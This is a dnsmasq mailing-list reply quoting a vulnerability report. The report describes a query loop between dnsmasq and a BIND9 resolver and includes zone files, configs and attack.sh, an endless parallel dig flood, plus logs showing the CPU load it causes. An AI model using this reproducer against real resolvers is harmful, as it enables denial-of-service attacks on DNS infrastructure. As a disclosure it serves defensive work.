On Tue, Apr 08, 2025 at 02:12:24PM +0800, 孔俊 wrote: > Hello there, > > I'd like to discuss a dnsmasq issue — especially since it also > involves BIND9. Due to the issue can potentially cause the BIND9 > resolver to crash through dnsmasq, it's definitely worth a deeper > look. Thank you for taking the time to read my document. > > Best regards, > jun kong > > > Dnsmasq-discuss mailing list
The document inline, markdown formatting probably lost, for the sake of discussion [1] > _______________________________________________ # Using dnsmasq to make bind9 resolver crash ### Summary Dnsmasq does not impose any restrictions on forwarding DNS packets. Due to this characteristic, it is possible to delegate queries to dnsmasq in a way that causes it to forward RD=0 DNS query packets to the resolver, leading to cache spoofing and potentially even causing the DNS resolver to crash. ### Dnsmasq versions affected Dnsmasq version 2.90 Copyright (c) 2000-2024 Simon Kelley Compile time options: IPv6 GNU-getopt no-DBus no-UBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset no-nftset auth cryptohash DNSSEC loop-detect inotify dumpfile This software comes with ABSOLUTELY NO WARRANTY. Dnsmasq is free software, and you are welcome to redistribute it under the terms of the GNU General Public License, version 2 or 3.. ### BIND versions affected BIND 9.18.34 (Extended Support Version) [id:] ### Preconditions and assumptions The attacker needs to control two authoritative DNS servers and one dnsmasq forwarder. The attack setup involves the following steps: On Authoritative DNS Server A, configure a large number of NS records pointing to Authoritative DNS Server B. On Authoritative DNS Server B, configure corresponding A records pointing to the dnsmasq forwarder. Set the dnsmasq forwarder's forwarder to point to the target BIND9 resolver. The attacker can then initiate the attack either by querying the controlled dnsmasq forwarder or by directly querying the target BIND9 resolver. ### Attacker's abilities The attacker needs to control two authoritative DNS servers and one dnsmasq forwarder. The attack setup involves the following steps: On Authoritative DNS Server A, configure a large number of NS records pointing to Authoritative DNS Server B. On Authoritative DNS Server B, configure corresponding A records pointing to the dnsmasq forwarder. Set the dnsmasq forwarder's forwarder to point to the target BIND9 resolver. Additionally, the attacker needs to be capable of concurrently executing a large volume of DNS query requests. ### Impact After launching the attack, the BIND9 resolver will continuously check, extract, and send cache data, leading to high CPU load. The related cached data is repeatedly transferred between the BIND9 resolver and dnsmasq. ### Steps to reproduce 1.use the attached configuration file. We need to configure two authoritative name servers and one dnsmasq forwarder. env file ``` BIND9_VERSION=9.18.34 DNSMASQ_IP=172.16.114.11 ROOT_SERVER_IP=172.16.114.103 TOP_LEVEL_SERVER_IP=172.16.114.104 FUN_TOP_LEVEL_SERVER_IP=172.16.114.105 VICTIM_SERVER2_IP=172.16.114.13 ATTACK_SERVER2_IP=172.16.114.15 RESOLVER_SERVER1_IP=172.16.114.18 ``` Authoritative name server A /etc/bind/attack2.com.zone ``` $TTL 65535 @ IN SOA ns1.attack2.com. admin.attack2.com. ( 2024102901 ; 3600 ; 1800 ; 1209600 ; 65535 ; ) IN NS ns1.attack2.com. ns1.attack2.com. IN A 172.16.114.15 ; www.attack2.com. IN A 8.210.5.115 ; a1.attack2.com. IN NS 1a1.victim2.com. a1.attack2.com. IN NS 1a2.victim2.com. a1.attack2.com. IN NS 1a3.victim2.com. a1.attack2.com. IN NS 1a4.victim2.com. …… a1.attack2.com. IN NS 1a100.victim2.com. a2.attack2.com. IN NS 2a1.victim2.com. a2.attack2.com. IN NS 2a2.victim2.com. …… a2.attack2.com. IN NS 2a100.victim2.com. …… a100.attack2.com. IN NS 100a1.victim2.com. a100.attack2.com. IN NS 100a2.victim2.com. …… a100.attack2.com. IN NS 100a100.victim2.com. …… z1.attack2.com. IN NS 1z1.victim2.com. z1.attack2.com. IN NS 1z2.victim2.com. …… z100.attack2.com. IN NS 100z1.victim2.com. …… z100.attack2.com. IN NS 100z100.victim2.com. ``` Authoritative name server B /etc/bind/victim2.com.zone ``` $TTL 65535 @ IN SOA ns1.victim2.com. admin.victim2.com. ( 2024102901 ; 3600 ; 1800 ; 1209600 ; 65535 ; ) IN NS ns1.victim2.com. ns1.victim2.com. IN A 172.16.114.13 ; www.victim2.com. IN A 8.210.5.115 ; 1a1.victim2.com. IN A 172.16.114.11 1a2.victim2.com. IN A 172.16.114.11 1a3.victim2.com. IN A 172.16.114.11 …… 100z100.victim2.com. IN A 172.16.114.11 ``` dnsmasq /etc/dnsmasq.conf ``` no-hosts no-resolv server=172.16.114.18 interface=eth0 ``` Victim resolver named.conf ``` options { directory "/var/named"; recursion yes; allow-recursion { any; }; listen-on { any; }; listen-on-v6 { any; }; dnssec-validation no; forwarders {}; resolver-query-timeout 200000; max-recursion-depth 150000; max-recursion-queries 150000; }; logging { channel query_log { file "/var/log/named.log" versions 3 size 5m; severity info; print-time yes; print-severity yes; print-category yes; }; category queries { query_log;}; }; zone "." IN { type hint; file "/etc/bind/root.hints"; }; ``` 2.Start the BIND server with command:`named -g -c /etc/bind/named.conf ` 3.Simulate attack traffic using the command ```shell ./attack.sh TARGET_IPS: 172.16.114.18 Attack_DOMAIN_PREFIX: attack2.com ``` attack.sh ```shell read -p "TARGET_IPS: " TARGET_IPS read -p "Attack_DOMAIN_PREFIX: " DOMAIN_PREFIX while true; do echo {a..z}{1..20} | tr ' ' '\n' | parallel -j 0 dig @"${TARGET_IPS}" {}.${DOMAIN_PREFIX} & echo {a..z}{21..40} | tr ' ' '\n' | parallel -j 0 dig @"${TARGET_IPS}" {}.${DOMAIN_PREFIX} & echo {a..z}{41..60} | tr ' ' '\n' | parallel -j 0 dig @"${TARGET_IPS}" {}.${DOMAIN_PREFIX} & echo {a..z}{61..80} | tr ' ' '\n' | parallel -j 0 dig @"${TARGET_IPS}" {}.${DOMAIN_PREFIX} & echo {a..z}{81..100} | tr ' ' '\n' | parallel -j 0 dig @"${TARGET_IPS}" {}.${DOMAIN_PREFIX} done ``` ### What is the current *bug* behavior? After performing iterative queries, the resolver sends a DNS query packet with the RD bit set to 0 to dnsmasq. Upon receiving it, dnsmasq immediately forwards the query to the BIND9 resolver. The BIND9 resolver, in turn, sends the related cache data back to dnsmasq, which then forwards it back to the BIND9 resolver again. During this process, the CPU usage of the BIND9 resolver increases and bandwidth is consumed. ### What is the expected *correct* behavior? The Dnsmasq should inspect incoming DNS packets and apply filtering before forwarding them — for example, filtering out those that may cause query loops. ### Relevant logs The request log generated by querying the resolver once for a1.attack2.com is as follows: ```shell 03-Apr-2025 05:10:11.656 client @0x7f7fd4000e98 172.25.0.1#53531 (a1.attack2.com): query: a1.attack2.com IN A +E(0)K (172.25.114.18) 03-Apr-2025 05:10:11.656 client @0x7f7fac000e98 172.25.114.11#45312 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.660 client @0x7f7fac009e38 172.25.114.11#42216 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.660 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.660 client @0x7f7f1c000e98 172.25.114.11#42407 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.660 client @0x7f7fa8004168 172.25.114.11#42232 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.664 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.664 client @0x7f7fcc0016e8 172.25.114.11#35871 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.664 client @0x7f7fc0004168 172.25.114.11#42236 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.664 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.664 client @0x7f7f1c000e98 172.25.114.11#38600 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.664 client @0x7f7f88004168 172.25.114.11#42238 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.668 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.668 client @0x7f8028002b98 172.25.114.11#53900 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.668 client @0x7f8030005328 172.25.114.11#42240 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.668 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.668 client @0x7f7efc000e98 172.25.114.11#34534 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.672 client @0x7f8018004168 172.25.114.11#42246 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.672 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.672 client @0x7f7f10000e98 172.25.114.11#39527 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.672 client @0x7f7f500023a8 172.25.114.11#42260 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.672 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.676 client @0x7f804c002288 172.25.114.11#43530 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.676 client @0x7f800c00a608 172.25.114.11#42262 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.676 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.676 client @0x7f7fb4000e98 172.25.114.11#34757 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.676 client @0x7f7ff8004168 172.25.114.11#42266 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.680 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.680 client @0x7f7f24000e98 172.25.114.11#38992 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.680 client @0x7f7f2c004168 172.25.114.11#42274 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.680 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.680 client @0x7f7ef0000e98 172.25.114.11#41795 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.684 client @0x7f804400bd78 172.25.114.11#42284 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.684 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.684 client @0x7f7f70000e98 172.25.114.11#37902 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.684 client @0x7f7fb80049b8 172.25.114.11#42300 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.684 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.688 client @0x7f8008001728 172.25.114.11#49112 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.688 client @0x7f7f48004168 172.25.114.11#42306 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.688 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.688 client @0x7f7ff0000e98 172.25.114.11#46963 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.688 client @0x7f7f8c0049f8 172.25.114.11#42310 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.692 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.692 client @0x7f7ee4000e98 172.25.114.11#56631 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.692 client @0x7f7f98004168 172.25.114.11#42322 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.692 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.692 client @0x7f7ee4000e98 172.25.114.11#39955 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.696 client @0x7f8008008958 172.25.114.11#42330 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.696 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.696 client @0x7f8048002d08 172.25.114.11#44902 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.696 client @0x7f7ef0009e38 172.25.114.11#42340 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.696 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.696 client @0x7f7ef0000e98 172.25.114.11#50258 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.700 client @0x7f7f140023a8 172.25.114.11#42356 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.700 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.700 client @0x7f801c000e98 172.25.114.11#59287 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.700 client @0x7f8010009df8 172.25.114.11#42364 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.700 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.700 client @0x7f7f14004168 172.25.114.11#43994 (a1.attack2.com): query: a1.attack2.com IN A -E(0)DCV (172.25.114.18) 03-Apr-2025 05:10:11.704 client @0x7f7ef4004168 172.25.114.11#42380 (a1.attack2.com): query: a1.attack2.com IN A -E(0)TDCV (172.25.114.18) 03-Apr-2025 05:10:11.704 lame server resolving 'a1.attack2.com' (in 'a1.attack2.com'?): 172.25.114.11#53 03-Apr-2025 05:10:11.704 client @0x7f7fd4000e98 172.25.0.1#53531 (a1.attack2.com): query failed (failure) for a1.attack2.com/IN/A at query.c:7885 ``` System monitoring data is as follows: ```shell #docker stats | grep resolver1 cfc4e71d77c6 resolver1 0.00% 46.67MiB / 2.5GiB 1.82% 10kB / 126B 4.1kB / 0B 163 cfc4e71d77c6 resolver1 0.00% 46.67MiB / 2.5GiB 1.82% 10kB / 126B 4.1kB / 0B 163 cfc4e71d77c6 resolver1 0.00% 46.67MiB / 2.5GiB 1.82% 10kB / 126B 4.1kB / 0B 163 cfc4e71d77c6 resolver1 0.00% 46.67MiB / 2.5GiB 1.82% 10kB / 126B 4.1kB / 0B 163 cfc4e71d77c6 resolver1 0.00% 46.67MiB / 2.5GiB 1.82% 10kB / 126B 4.1kB / 0B 163 cfc4e71d77c6 resolver1 0.00% 46.67MiB / 2.5GiB 1.82% 10kB / 126B 4.1kB / 0B 163 cfc4e71d77c6 resolver1 0.00% 46.67MiB / 2.5GiB 1.82% 10kB / 126B 4.1kB / 0B 163 cfc4e71d77c6 resolver1 0.00% 46.67MiB / 2.5GiB 1.82% 10kB / 126B 4.1kB / 0B 163 cfc4e71d77c6 resolver1 0.00% 46.67MiB / 2.5GiB 1.82% 10kB / 126B 4.1kB / 0B 163 cfc4e71d77c6 resolver1 35.91% 63.39MiB / 2.5GiB 2.48% 208kB / 91.3kB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 35.91% 63.39MiB / 2.5GiB 2.48% 208kB / 91.3kB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 35.91% 63.39MiB / 2.5GiB 2.48% 208kB / 91.3kB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 35.91% 63.39MiB / 2.5GiB 2.48% 208kB / 91.3kB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 197.74% 146.1MiB / 2.5GiB 5.71% 1.8MB / 810kB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 197.74% 146.1MiB / 2.5GiB 5.71% 1.8MB / 810kB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 197.74% 146.1MiB / 2.5GiB 5.71% 1.8MB / 810kB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 197.74% 146.1MiB / 2.5GiB 5.71% 1.8MB / 810kB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 216.88% 159.6MiB / 2.5GiB 6.24% 3.16MB / 1.39MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 216.88% 159.6MiB / 2.5GiB 6.24% 3.16MB / 1.39MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 216.88% 159.6MiB / 2.5GiB 6.24% 3.16MB / 1.39MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 216.88% 159.6MiB / 2.5GiB 6.24% 3.16MB / 1.39MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 205.44% 166.3MiB / 2.5GiB 6.50% 3.51MB / 1.55MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 205.44% 166.3MiB / 2.5GiB 6.50% 3.51MB / 1.55MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 205.44% 166.3MiB / 2.5GiB 6.50% 3.51MB / 1.55MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 205.44% 166.3MiB / 2.5GiB 6.50% 3.51MB / 1.55MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 187.48% 171.3MiB / 2.5GiB 6.69% 3.84MB / 1.69MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 187.48% 171.3MiB / 2.5GiB 6.69% 3.84MB / 1.69MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 187.48% 171.3MiB / 2.5GiB 6.69% 3.84MB / 1.69MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 187.48% 171.3MiB / 2.5GiB 6.69% 3.84MB / 1.69MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 212.67% 178.6MiB / 2.5GiB 6.98% 4.17MB / 1.83MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 212.67% 178.6MiB / 2.5GiB 6.98% 4.17MB / 1.83MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 212.67% 178.6MiB / 2.5GiB 6.98% 4.17MB / 1.83MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 212.67% 178.6MiB / 2.5GiB 6.98% 4.17MB / 1.83MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 212.67% 178.6MiB / 2.5GiB 6.98% 4.17MB / 1.83MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 212.67% 178.6MiB / 2.5GiB 6.98% 4.17MB / 1.83MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 207.78% 191.2MiB / 2.5GiB 7.47% 4.68MB / 1.98MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 207.78% 191.2MiB / 2.5GiB 7.47% 4.68MB / 1.98MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 207.78% 191.2MiB / 2.5GiB 7.47% 4.68MB / 1.98MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 207.78% 191.2MiB / 2.5GiB 7.47% 4.68MB / 1.98MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 189.34% 204.3MiB / 2.5GiB 7.98% 5.28MB / 2.26MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 189.34% 204.3MiB / 2.5GiB 7.98% 5.28MB / 2.26MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 189.34% 204.3MiB / 2.5GiB 7.98% 5.28MB / 2.26MB 4.1kB / 0B 163 cfc4e71d77c6 resolver1 189.34% 204.3MiB / 2.5GiB 7.98% 5.28MB / 2.26MB 4.1kB / 0B 163 ``` > _______________________________________________ Some feedback, for the sake of the discussion - To me it seems that the reproducer is build in "Docker" - It would a good thing to have the reproducer better documented. Example given: Document where the environment variables should read - It would better thing to be able to `git clone protocol://host.domain.tld/team/projectfoo.git` where "project foo" has al the docker-compose components - This email summary is: the email has been seen Groeten Geert Stappers [1] a detour to an external document breaks discussion -- Silence is hard to parse _______________________________________________ Dnsmasq-discuss mailing list Dnsmasq-discuss@lists.thekelleys.org.uk https://lists.thekelleys.org.uk/cgi-bin/mailman/listinfo/dnsmasq-discuss